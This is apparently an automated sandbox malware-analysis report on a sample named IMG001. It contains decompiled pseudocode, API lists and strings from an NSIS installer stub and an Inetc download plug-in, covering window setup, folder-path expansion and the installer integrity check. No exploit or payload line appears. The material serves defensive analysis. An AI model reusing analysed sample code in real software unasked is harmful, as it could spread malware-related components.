Opcode ID: 8b991f50b65c910208eeef338ad4d920e6d059c06682b1eced57ff06524cf022
Instruction ID: d965a10b41e6d1c9dede79030cb730ac89f2a8f7b515cb03931853280b0308a0
Opcode Fuzzy Hash: 8b991f50b65c910208eeef338ad4d920e6d059c06682b1eced57ff06524cf022
Instruction Fuzzy Hash: 3141A9B2684A26BFE71237A78C4AF5E3B7EEB01751F75021CF20A670C1DBB456508A58

Uniqueness

Uniqueness Score: -1.00%

Function 00403539, Relevance: 42.2, APIs: 15, Strings: 9, Instructions: 216
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403539() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				int _t42;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t86;

				_t81 =  *0x7c56b0;
				_t20 = E00405D12(6);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x7b04b0;
					 *0x7f6000 = 0x7830;
					E004058D7(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x7b04b0, 0);
					__eflags =  *0x7b04b0;
					if(__eflags == 0) {
						E004058D7(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x7b04b0, 0);
					}
					lstrcatA(0x7f6000, _t79);
				} else {
					E0040594E(0x7f6000,  *_t20() & 0x0000ffff);
				}
				E00403802(_t76, _t88);
				 *0x7c5720 =  *0x7c56b8 & 0x00000020;
				 *0x7c573c = 0x10000;
				if(E004055C4(_t88, 0x7f0000) != 0) {
					L16:
					if(E004055C4(_t96, 0x7f0000) == 0) {
						E00405A12(0, _t79, _t81, 0x7f0000,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x7c56a0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x7c1688 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403802(_t76, __eflags);
							__eflags =  *0x7c5740;
							if( *0x7c5740 != 0) {
								_t31 = E00404E60(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x7c166c;
								if( *0x7c166c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x7b0488, 5);
							_t37 = LoadLibraryA("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t86 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t86, 0x7c1640);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x7c1640);
								 *0x7c1664 = _t86;
								RegisterClassA(0x7c1640);
							}
							_t42 = DialogBoxParamA( *0x7c56a0,  *0x7c1680 + 0x00000069 & 0x0000ffff, 0, E004038CF, 0);
							E00403489(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x7c56a0;
						 *0x7c1654 = _t28;
						_v20 = 0x624e5f;
						 *0x7c1644 = 0x401000;
						 *0x7c1650 =  *0x7c56a0;
						 *0x7c1664 =  &_v20;
						if(RegisterClassA(0x7c1640) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x7b0488 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7c56a0, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t79 = 0x7bd640;
					E004058D7( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) +  *0x7c56d8, 0x7bd640, 0);
					_t62 =  *0x7bd640; // 0x67
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x7bd641;
						 *((char*)(E0040550E(0x7bd641, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E004059F0(0x7f0000, E004054E3(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E0040552A(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

APIs

Part of subcall function 00405D12: GetModuleHandleA.KERNEL32(?,?,00000000,00403121,00000008), ref: 00405D24
Part of subcall function 00405D12: LoadLibraryA.KERNEL32(?,?,00000000,00403121,00000008), ref: 00405D2F
Part of subcall function 00405D12: GetProcAddress.KERNEL32(00000000,?), ref: 00405D40

lstrcatA.KERNEL32(007F6000,007B04B0,80000001,Control Panel\Desktop\ResourceLocale,00000000,007B04B0,00000000,00000006,007EE000,00000000,007F8000,00000000), ref: 004035AA
lstrlenA.KERNEL32(get,?,?,?,get,00000000,007F0000,007F6000,007B04B0,80000001,Control Panel\Desktop\ResourceLocale,00000000,007B04B0,00000000,00000006,007EE000), ref: 0040361F
lstrcmpiA.KERNEL32(?,.exe,get,?,?,?,get,00000000,007F0000,007F6000,007B04B0,80000001,Control Panel\Desktop\ResourceLocale,00000000,007B04B0,00000000), ref: 00403632
GetFileAttributesA.KERNEL32(get), ref: 0040363D
LoadImageA.USER32 ref: 00403686

Part of subcall function 0040594E: wsprintfA.USER32 ref: 0040595B

RegisterClassA.USER32 ref: 004036CD
SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004036E5
CreateWindowExA.USER32 ref: 0040371E
ShowWindow.USER32(00000005,00000000), ref: 00403754
LoadLibraryA.KERNEL32(RichEd20), ref: 00403765
LoadLibraryA.KERNEL32(RichEd32), ref: 00403770
GetClassInfoA.USER32 ref: 00403780
GetClassInfoA.USER32 ref: 0040378D
RegisterClassA.USER32 ref: 00403796
DialogBoxParamA.USER32 ref: 004037B5

Strings

.exe, xrefs: 0040362C
.DEFAULT\Control Panel\International, xrefs: 00403595
_Nb, xrefs: 004036DC, 004036E1
RichEdit20A, xrefs: 00403778, 0040377E
get, xrefs: 004035ED, 004035F5, 00403602, 0040361E, 0040363C, 0040364C, 00403652
RichEdit, xrefs: 00403787
RichEd20, xrefs: 00403760
Control Panel\Desktop\ResourceLocale, xrefs: 0040356D
RichEd32, xrefs: 0040376B

Memory Dump Source

Source File: 00000006.00000002.513034077.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.513026793.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513046733.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513055155.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513061571.000000000040B000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513067962.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513075385.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513670766.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513698298.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513707301.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513715592.00000000007E0000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513721767.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_IMG001.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$get
API String ID: 914957316-431086581
Opcode ID: 90656930fb87bb5256545a39020ef3d9096cda405e0a7b6f2be00f50b7daa507
Instruction ID: 8c621e14f72e88bd80986ac3a21b0b3abaff23a62075e42d3877170e53afbe30
Opcode Fuzzy Hash: 90656930fb87bb5256545a39020ef3d9096cda405e0a7b6f2be00f50b7daa507
Instruction Fuzzy Hash: DC61C1B0500240BED220AF619C85F273BADEB41759F44853EF941B62E2DB7DAD408B3E

Uniqueness

Uniqueness Score: -1.00%

Function 7381119C, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 163
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E7381119C(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t15;
				void* _t29;
				void* _t32;
				CHAR* _t34;
				intOrPtr _t35;
				CHAR* _t39;
				int _t42;
				void* _t44;
				long _t56;
				struct HWND__* _t58;
				void* _t60;
				CHAR* _t63;
				intOrPtr _t65;
				void* _t67;
				unsigned int _t74;
				void* _t81;

				_t15 = _a8 - 0xf;
				if(_t15 == 0) {
					_t58 = _a4;
					RedrawWindow(GetDlgItem(_t58, 0x3e9), 0, 0, 1);
					RedrawWindow(GetDlgItem(_t58, 2), 0, 0, 1);
					RedrawWindow(GetDlgItem(_t58, 0x3ed), 0, 0, 1);
					UpdateWindow(GetDlgItem(_t58, 0x3e9));
					UpdateWindow(GetDlgItem(_t58, 2));
					UpdateWindow(GetDlgItem(_t58, 0x3ed));
					L26:
					__eflags = 0;
					return 0;
				}
				_t29 = _t15 - 0x101;
				if(_t29 == 0) {
					E73811E77(_t60, _a4); // executed
					E738110C7(_t67, _a4);
					goto L26;
				}
				_t32 = _t29 - 1;
				if(_t32 == 0) {
					_t74 = _a12;
					_t34 = (_t74 & 0x0000ffff) - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						_t35 =  *0x73815ab4; // 0x4
						L21:
						__eflags = _t35 - 3;
						if(_t35 == 3) {
							L23:
							KillTimer(_a4, 1);
							DestroyWindow(_a4); // executed
							goto L26;
						}
						__eflags = _t74 >> 0x10 - 0xffee;
						if(_t74 >> 0x10 != 0xffee) {
							goto L26;
						}
						goto L23;
					}
					_t39 = _t34 - 1;
					__eflags = _t39;
					if(_t39 != 0) {
						goto L26;
					}
					__eflags =  *0x73815adb - _t39; // 0x0
					if(__eflags != 0) {
						goto L26;
					}
					_t63 =  *0x738157e0; // 0x0
					__eflags = _t63;
					if(_t63 == 0) {
						L19:
						_t35 = 3;
						 *0x73815ab4 = _t35;
						goto L21;
					}
					__eflags =  *0x73815828;
					_t41 =  ==  ? "Inetc plug-in" : 0x73815828;
					_t42 = MessageBoxA(_a4, _t63,  ==  ? "Inetc plug-in" : 0x73815828, 0x34);
					__eflags = _t42 - 7;
					if(_t42 == 7) {
						goto L26;
					}
					goto L19;
				}
				_t44 = _t32;
				if(_t44 != 0) {
					goto L26;
				}
				_t81 =  *0x73815ad8 - _t44; // 0x1
				if(_t81 == 0 && IsWindow(_a4) != 0) {
					if( *0x73815ab4 != 2) {
						_t56 = GetTickCount();
						_t65 =  *0x73815ad0; // 0x680e3e
						if(_t56 - _t65 > 0x3e8) {
							 *0x73815ad0 = _t65 + 0x3e8;
						}
					}
					if( *0x73815ad9 == 0) {
						E73812BCC();
					} else {
						E7381207B(_a4);
					}
					RedrawWindow(GetDlgItem(_a4, 0x3e9), 0, 0, 1);
					RedrawWindow(GetDlgItem(_a4, 2), 0, 0, 1);
					RedrawWindow(GetDlgItem(_a4, 0x3ed), 0, 0, 1);
				}
				return 1;
			}

0x738111a5
0x738111a8
0x73811307
0x73811325
0x73811333
0x73811344
0x73811355
0x7381135d
0x73811368
0x7381136a
0x7381136a
0x00000000
0x7381136a
0x738111ae
0x738111b3
0x738112f6
0x738112fe
0x00000000
0x73811304
0x738111b9
0x738111ba
0x73811268
0x7381126e
0x7381126e
0x7381126f
0x738112c2
0x738112c7
0x738112c7
0x738112ca
0x738112dd
0x738112e2
0x738112eb
0x00000000
0x738112eb
0x738112d4
0x738112d7
0x00000000
0x00000000
0x00000000
0x738112d7
0x73811271
0x73811271
0x73811272
0x00000000
0x00000000
0x73811278
0x7381127e
0x00000000
0x00000000
0x73811284
0x7381128a
0x7381128c
0x738112b8
0x738112ba
0x738112bb
0x00000000
0x738112bb
0x7381128e
0x738112a1
0x738112a9
0x738112af
0x738112b2
0x00000000
0x00000000
0x00000000
0x738112b2
0x738111c1
0x738111c2
0x00000000
0x00000000
0x738111c8
0x738111ce
0x738111e8
0x738111ea
0x738111f0
0x738111ff
0x73811203
0x73811203
0x738111ff
0x73811210
0x7381121d
0x73811212
0x73811215
0x7381121a
0x7381123f
0x7381124d
0x7381125e
0x7381125e
0x00000000

APIs

IsWindow.USER32(?), ref: 738111D7
GetTickCount.KERNEL32 ref: 738111EA
GetDlgItem.USER32 ref: 73811236
RedrawWindow.USER32(00000000), ref: 7381123F
GetDlgItem.USER32 ref: 7381124A
RedrawWindow.USER32(00000000), ref: 7381124D
GetDlgItem.USER32 ref: 7381125B
RedrawWindow.USER32(00000000), ref: 7381125E
MessageBoxA.USER32 ref: 738112A9
KillTimer.USER32(?,00000001), ref: 738112E2
DestroyWindow.USER32(?), ref: 738112EB
GetDlgItem.USER32 ref: 7381131C
RedrawWindow.USER32(00000000), ref: 73811325
GetDlgItem.USER32 ref: 73811330
RedrawWindow.USER32(00000000), ref: 73811333
GetDlgItem.USER32 ref: 73811341
RedrawWindow.USER32(00000000), ref: 73811344
GetDlgItem.USER32 ref: 7381134C
UpdateWindow.USER32(00000000), ref: 73811355
GetDlgItem.USER32 ref: 7381135A
UpdateWindow.USER32(00000000), ref: 7381135D
GetDlgItem.USER32 ref: 73811365
UpdateWindow.USER32(00000000), ref: 73811368

Strings

Inetc plug-in, xrefs: 73811297

Memory Dump Source

Source File: 00000006.00000002.517158202.0000000073811000.00000020.00020000.sdmp, Offset: 73810000, based on PE: true

Associated: 00000006.00000002.517148776.0000000073810000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.517168485.0000000073814000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.517176098.0000000073815000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.517187455.0000000073819000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_73810000_IMG001.jbxd

Similarity

API ID: Window$Item$Redraw$Update$CountDestroyKillMessageTickTimer
String ID: Inetc plug-in
API String ID: 710672773-2626376821
Opcode ID: 5e3495c976c8a9bad578464fe9048c3a4069ef8fcbfab84389ea630b4275339b
Instruction ID: 0f693fcb15a8fbc6de710c8a5435a847991299f01456c20a10032e6778e1a73e
Opcode Fuzzy Hash: 5e3495c976c8a9bad578464fe9048c3a4069ef8fcbfab84389ea630b4275339b
Instruction Fuzzy Hash: D541F4B264071EBBEB116BB6CC8AF5A7F2FEB40740F24451DF20ADB0D0D6B49960CA50

Uniqueness

Uniqueness Score: -1.00%

Function 00405A12, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E00405A12(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				signed int _t74;
				signed int _t75;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x7c167c - 4 + _t36 * 4);
				}
				_t74 =  *0x7c56d8 + _t36;
				_t37 = 0x7bd640;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x7bd640;
				if(_a4 - 0x7bd640 < 0x4000) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x2000;
					if(_t86 - _t37 >= 0x2000) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405A12(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x7bd640;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xd) + 0x7c6000;
							E004059F0(_t86, (_t95 << 0xd) + 0x7c6000);
						} else {
							E0040594E(_t86,  *0x7c56a8);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405C52(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x7c5724;
						if( *0x7c5724 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x2000);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x7c56a4;
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x7c56a8,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x7c56a8,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86); // executed
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x2000);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x7c56d8;
							E004058D7(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x7c56d8, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405A12(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E004059F0(_a4, _t37);
			}

APIs

GetVersion.KERNEL32(?,007AC488,00000000,00404DC6,007AC488,00000000), ref: 00405ABA
GetSystemDirectoryA.KERNEL32 ref: 00405B35
GetWindowsDirectoryA.KERNEL32(get,00002000), ref: 00405B48
SHGetSpecialFolderLocation.SHELL32(?,0079BA58), ref: 00405B84
SHGetPathFromIDListA.SHELL32(0079BA58,get), ref: 00405B92
CoTaskMemFree.OLE32(0079BA58), ref: 00405B9D
lstrcatA.KERNEL32(get,\Microsoft\Internet Explorer\Quick Launch), ref: 00405BBF
lstrlenA.KERNEL32(get,?,007AC488,00000000,00404DC6,007AC488,00000000), ref: 00405C11

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405BB9
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405B04
get, xrefs: 00405A3B, 00405B02, 00405B1F, 00405B34, 00405B47, 00405B63, 00405B8E, 00405BBE, 00405BC4, 00405BDC, 00405BEF, 00405C0A, 00405C10, 00405C1B, 00405C45

Memory Dump Source

Source File: 00000006.00000002.513034077.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.513026793.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513046733.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513055155.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513061571.000000000040B000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513067962.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513075385.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513670766.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513698298.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513707301.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513715592.00000000007E0000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513721767.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_IMG001.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$get
API String ID: 900638850-1821354785
Opcode ID: d9708ddf32402296e38a106115687542a2b6d2f94fd80a53177eac3040c2fff3
Instruction ID: c6751bb8eccc804ec61c49aead727a37010080e613970cf4b87633533313e554
Opcode Fuzzy Hash: d9708ddf32402296e38a106115687542a2b6d2f94fd80a53177eac3040c2fff3
Instruction Fuzzy Hash: 2351D231A04A04ABEF206B249C84B7F3BB4DB55724F14423BE511BA2D1D37D6981DF5E

Uniqueness

Uniqueness Score: -1.00%

Function 00402C22, Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00402C22(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _t50;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				intOrPtr* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				 *0x7c56ac = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, 0x7fc000, 0x2000);
				_t89 = E004056C7(0x7fc000, 0x80000000, 3);
				_v16 = _t89;
				 *0x409014 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				E004059F0(0x7f4000, 0x7fc000);
				E004059F0(0x7fe000, E0040552A(0x7f4000));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x7a6460 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BBE(1);
					__eflags =  *0x7c56b4 - _t82;
					if( *0x7c56b4 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t94 = GlobalAlloc(0x40, _v24);
						E00403093( *0x7c56b4 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff);
						_t57 = E00402E5B();
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x7c56b0 = _t94;
							 *0x7c56b8 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x7c56bc =  *0x7c56bc + 1;
								__eflags =  *0x7c56bc;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405688(0x7c56c0, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E00403093( *0x792454);
					_t65 = E00403061( &_a4, 4); // executed
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x7c56b4) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403061(0x79e460, _t90); // executed
						__eflags = _t71;
						if(_t71 == 0) {
							E00402BBE(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x7c56b4;
						if( *0x7c56b4 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BBE(0);
							}
							goto L20;
						}
						E00405688( &_v44, 0x79e460, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x792454; // 0x363211
						 *0x7c5740 =  *0x7c5740 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x7c56b4 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x40915c
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x7a6460; // 0x363215
						if(__eflags < 0) {
							_v12 = E00405D7E(_v12, 0x79e460, _t90);
						}
						 *0x792454 =  *0x792454 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

APIs

GetTickCount.KERNEL32 ref: 00402C33
GetModuleFileNameA.KERNEL32(00000000,007FC000,00002000), ref: 00402C4F

Part of subcall function 004056C7: GetFileAttributesA.KERNEL32(00000003,00402C62,007FC000,80000000,00000003), ref: 004056CB
Part of subcall function 004056C7: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004056ED

GetFileSize.KERNEL32(00000000,00000000,007FE000,00000000,007F4000,007F4000,007FC000,007FC000,80000000,00000003), ref: 00402C9B

Strings

`y, xrefs: 00402CB0
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402DFA
Inst, xrefs: 00402D07
Error launching installer, xrefs: 00402C72
Null, xrefs: 00402D19
soft, xrefs: 00402D10

Memory Dump Source

Source File: 00000006.00000002.513034077.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.513026793.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513046733.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513055155.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513061571.000000000040B000.00000004.00020000.sdmp Download File
